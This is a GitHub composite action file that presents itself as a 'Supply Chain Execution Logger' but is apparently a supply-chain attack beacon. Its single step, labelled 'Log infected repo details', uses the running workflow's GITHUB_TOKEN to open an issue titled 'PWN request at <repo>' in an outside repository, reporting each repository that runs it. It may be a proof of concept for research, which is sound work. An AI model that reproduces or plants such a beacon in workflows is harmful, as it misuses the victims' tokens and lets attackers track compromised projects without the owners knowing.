name: 'Supply Chain Execution Logger'
description: 'Creates an issue in a designated repository to log workflow execution details'
author: 'PWN Organization'

runs:
  using: 'composite'
  steps:
    - name: Log infected repo details
      shell: bash
      env:
        REPOSITORY: ${{ github.repository }}
      run: |
        echo ${{ github.repository }}
        curl -s -X POST \
          -H "Authorization: token ${{ env.GITHUB_TOKEN }}" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/octoberwar/logger-action/issues \
          -d "{\"title\":\"PWN request at ${REPOSITORY}\", \"body\":\"${REPOSITORY}\"}"
